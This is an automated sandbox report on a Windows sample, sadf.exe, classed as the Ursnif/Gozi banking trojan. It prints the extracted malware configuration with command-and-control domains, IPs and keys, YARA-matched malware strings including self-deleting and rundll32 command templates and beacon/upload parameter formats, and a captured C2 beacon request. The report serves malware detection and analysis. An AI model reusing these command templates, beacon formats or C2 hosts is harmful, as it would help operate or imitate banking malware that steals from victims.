Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sadf.exe

Overview

General Information

Sample Name:sadf.exe
Analysis ID:717378
MD5:76ebba129360ad5093f0fe66910eb06d
SHA1:a0297ed108f534539bda64c7c0df0caefc18ec09
SHA256:f8388847ebddbc0c6db43ede0ee839fa304fc4786d4a7c8285eb746a5a2ee711
Tags:exegozi
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected Ursnif
Found evasive API chain (may stop execution after checking system information)
Writes or reads registry keys via WMI
Writes registry values via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Contains functionality to dynamically determine API calls
Uses Microsoft's Enhanced Cryptographic Provider
IP address seen in connection with other malware

Classification

  • System is w10x64
  • sadf.exe (PID: 4968 cmdline: C:\Users\user\Desktop\sadf.exe MD5: 76EBBA129360AD5093F0FE66910EB06D)
  • cleanup
{"RSA Public Key": "KP46f4CSOep7BSWPpucTqe9MnoQIxAJdxmnsnKjRPh30CMVAPreV/NpSazOVd2zPdnjdZQHY+Cvofnd/xGJFkA4E5BTdR3u+QObYXv8YvHazXI/uLIcOvWbvGxuUzuuk/TH9ilTtJMycrkwpZD0LW24TKdeWfJczm/L6RbpfqZr9WWDsXDbOHANWxyDHKJGDJG2IU3p48MZfoSwM4BvR2skdnwdXWfqWwHJCoFeM8tl7yqZFBScY3HlZCEubEX2H6C4V+yqjVoHuMiRO1WZeoeH9XJqrsd/oGxvQ0Xe4ONA/9P7HUNK74Au67zOyI1/CuTM0x7bMpuIbs7Bp0V/e7Z1w85k4CI7C6M3K37IicCU=", "c2_domain": ["trackingg-protectioon.cdn1.mozilla.net", "45.8.158.104", "trackingg-protectioon.cdn1.mozilla.net", "188.127.224.114", "weiqeqwns.com", "wdeiqeqwns.com", "weiqeqwens.com", "weiqewqwns.com", "iujdhsndjfks.com"], "botnet": "200000", "server": "50", "serpent_key": "hFwQ4dANrmDZu2Iu", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
SourceRuleDescriptionAuthorStrings
00000000.00000003.384425288.0000000001308000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
  • 0xff0:$a1: /C ping localhost -n %u && del "%s"
  • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
  • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
  • 0xca8:$a5: filename="%.4u.%lu"
  • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xe72:$a9: &whoami=%s
  • 0xe5a:$a10: %u.%u_%u_%u_x%u
  • 0xc22:$a11: size=%u&hash=0x%08x
  • 0xc13:$a12: &uptime=%u
  • 0xda7:$a13: %systemroot%\system32\c_1252.nls
  • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.384425288.0000000001308000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
  • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
  • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
  • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
  • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
  • 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.384568130.0000000001308000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
  • 0xff0:$a1: /C ping localhost -n %u && del "%s"
  • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
  • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
  • 0xca8:$a5: filename="%.4u.%lu"
  • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xe72:$a9: &whoami=%s
  • 0xe5a:$a10: %u.%u_%u_%u_x%u
  • 0xc22:$a11: size=%u&hash=0x%08x
  • 0xc13:$a12: &uptime=%u
  • 0xda7:$a13: %systemroot%\system32\c_1252.nls
  • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.384568130.0000000001308000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
  • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
  • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
  • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
  • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
  • 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.384610353.0000000001308000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
  • 0xff0:$a1: /C ping localhost -n %u && del "%s"
  • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
  • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
  • 0xca8:$a5: filename="%.4u.%lu"
  • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xe72:$a9: &whoami=%s
  • 0xe5a:$a10: %u.%u_%u_%u_x%u
  • 0xc22:$a11: size=%u&hash=0x%08x
  • 0xc13:$a12: &uptime=%u
  • 0xda7:$a13: %systemroot%\system32\c_1252.nls
  • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
Click to see the 16 entries
SourceRuleDescriptionAuthorStrings
0.2.sadf.exe.8c0000.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
    0.2.sadf.exe.e194a0.2.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
      No Sigma rule has matched
      Timestamp:192.168.2.345.8.158.10449704802033204 10/06/22-12:30:02.562975
      SID:2033204
      Source Port:49704
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: sadf.exeAvira: detected
      Source: sadf.exeReversingLabs: Detection: 88%
      Source: sadf.exeJoe Sandbox ML: detected
      Source: 0.0.sadf.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
      Source: 0.2.sadf.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
      Source: sadf.exeMalware Configuration Extractor: Ursnif {"RSA Public Key": "KP46f4CSOep7BSWPpucTqe9MnoQIxAJdxmnsnKjRPh30CMVAPreV/NpSazOVd2zPdnjdZQHY+Cvofnd/xGJFkA4E5BTdR3u+QObYXv8YvHazXI/uLIcOvWbvGxuUzuuk/TH9ilTtJMycrkwpZD0LW24TKdeWfJczm/L6RbpfqZr9WWDsXDbOHANWxyDHKJGDJG2IU3p48MZfoSwM4BvR2skdnwdXWfqWwHJCoFeM8tl7yqZFBScY3HlZCEubEX2H6C4V+yqjVoHuMiRO1WZeoeH9XJqrsd/oGxvQ0Xe4ONA/9P7HUNK74Au67zOyI1/CuTM0x7bMpuIbs7Bp0V/e7Z1w85k4CI7C6M3K37IicCU=", "c2_domain": ["trackingg-protectioon.cdn1.mozilla.net", "45.8.158.104", "trackingg-protectioon.cdn1.mozilla.net", "188.127.224.114", "weiqeqwns.com", "wdeiqeqwns.com", "weiqeqwens.com", "weiqewqwns.com", "iujdhsndjfks.com"], "botnet": "200000", "server": "50", "serpent_key": "hFwQ4dANrmDZu2Iu", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
      Source: C:\Users\user\Desktop\sadf.exeCode function: 0_2_008C47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
      Source: sadf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

      Networking

      barindex
      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49704 -> 45.8.158.104:80
      Source: global trafficHTTP traffic detected: GET /uploaded/OefU6cYu_/2Bh5eSBuW1HoOJMcO7vA/d7SIWeoRQwnGkilzDpQ/6dU8XqIZtXmxeiGmmCE64H/f1Nt6sF7IrG2P/R1VRcVzY/_2BT38Jx_2Fbr7v8to_2FLq/VG0YsHE8mG/n_2F2PKN3TdKATV_2/FTdVW4ur9Omp/jrWMtuTkF90/3KGyudEpayTHCC/YXqBDl4ORyiaSJOw9sN_2/Fdabc1TmxPXNvinn/JCaxgYaDxedKHZk/u146Q0qWggdX24am_2/BCgVA4PEZ/TXr3WTRz0EG0cXZKBsrD/1oC2dl2fycp/FBzL9h.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 45.8.158.104Connection: Keep-AliveCache-Control: no-cache
      Source: Joe Sandbox ViewASN Name: ASBAXETNRU ASBAXETNRU
      Source: unknownDNS traffic detected: query: trackingg-protectioon.cdn1.mozilla.net replaycode: Name error (3)
      Source: Joe Sandbox ViewIP Address: 45.8.158.104 45.8.158.104
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
      Source: sadf.exe, 00000000.00000002.511247920.00000000009FC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://45.8.1
      Source: unknownDNS traffic detected: queries for: trackingg-protectioon.cdn1.mozilla.net
      Source: global trafficHTTP traffic detected: GET /uploaded/OefU6cYu_/2Bh5eSBuW1HoOJMcO7vA/d7SIWeoRQwnGkilzDpQ/6dU8XqIZtXmxeiGmmCE64H/f1Nt6sF7IrG2P/R1VRcVzY/_2BT38Jx_2Fbr7v8to_2FLq/VG0YsHE8mG/n_2F2PKN3TdKATV_2/FTdVW4ur9Omp/jrWMtuTkF90/3KGyudEpayTHCC/YXqBDl4ORyiaSJOw9sN_2/Fdabc1TmxPXNvinn/JCaxgYaDxedKHZk/u146Q0qWggdX24am_2/BCgVA4PEZ/TXr3WTRz0EG0cXZKBsrD/1oC2dl2fycp/FBzL9h.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 45.8.158.104Connection: Keep-AliveCache-Control: no-cache

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Source: Yara matchFile source: 0.2.sadf.exe.8c0000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.sadf.exe.e194a0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000000.00000002.511376097.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 0.2.sadf.exe.8c0000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.sadf.exe.e194a0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000000.00000002.511376097.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\sadf.exeCode function: 0_2_008C47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

      System Summary

      barindex
      Source: 00000000.00000003.384425288.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.384425288.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.384568130.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.384568130.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.384610353.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.384610353.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000002.511485713.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000002.511485713.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.384466253.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.384466253.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.384373909.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.384373909.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.384538617.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.384538617.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.384591559.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.384591559.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.384627029.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.384627029.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: Process Memory Space: sadf.exe PID: 4968, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: Process Memory Space: sadf.exe PID: 4968, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: C:\Users\user\Desktop\sadf.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
      Source: C:\Users\user\Desktop\sadf.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Users\user\Desktop\sadf.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Users\user\Desktop\sadf.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: C:\Users\user\Desktop\sadf.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Users\user\Desktop\sadf.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Users\user\Desktop\sadf.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: sadf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000003.384425288.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.384425288.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.384568130.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.384568130.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.384610353.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.384610353.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000002.511485713.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000002.511485713.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.384466253.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.384466253.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.384373909.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.384373909.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.384538617.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.384538617.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.384591559.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.384591559.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.384627029.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.384627029.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: Process Memory Space: sadf.exe PID: 4968, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: Process Memory Space: sadf.exe PID: 4968, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\sadf.exeCode function: 0_2_008C82FC
      Source: C:\Users\user\Desktop\sadf.exeCode function: 0_2_008C2792
      Source: C:\Users\user\Desktop\sadf.exeCode function: 0_2_008C2DCC
      Source: C:\Users\user\Desktop\sadf.exeCode function: 0_2_00401493 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
      Source: C:\Users\user\Desktop\sadf.exeCode function: 0_2_00401D95 GetProcAddress,NtCreateSection,memset,
      Source: C:\Users\user\Desktop\sadf.exeCode function: 0_2_00401F78 NtMapViewOfSection,
      Source: C:\Users\user\Desktop\sadf.exeCode function: 0_2_008C737C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
      Source: C:\Users\user\Desktop\sadf.exeCode function: 0_2_008C8521 NtQueryVirtualMemory,
      Source: sadf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: sadf.exeReversingLabs: Detection: 88%
